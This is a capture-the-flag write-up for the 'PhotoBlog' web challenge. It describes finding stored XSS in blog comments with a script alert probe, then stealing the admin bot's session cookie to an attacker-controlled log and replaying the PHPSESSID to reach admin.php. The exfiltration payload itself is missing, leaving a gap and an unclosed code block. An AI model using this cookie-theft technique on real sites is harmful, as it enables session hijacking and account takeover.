# PhotoBlog

## Task

A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea?

## Solution

The website to pown is a photoblog where you can add comments on a cat picture.

By posting comments such as `<script>alert(123)</script>` we notice that there is an XSS vulnerability.

The admin panel is located at the address `admin.php`. Although, when we we try to access it we are redirected to `login.php`.
The XSS vulnerability can be used to get the admin's cookie in order to connect to `admin.php`.

After we posted the following comment


we got the following request in our logs.

``` - - [06/Feb/2016:14:52:07 +0100] "GET /pirate.png?loc= HTTP/1.1" 404 142 "" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"

The admin's `PHPSESSID` is `515386866780b5f132fc96c02b3ddb82`.

Once we changed our cookie, we can access `admin.php` and get the flag.

Original writeup (https://github.com/QuokkaLight/write-ups/blob/master/sharif-university-ctf-2016/web/PhotoBlog.md).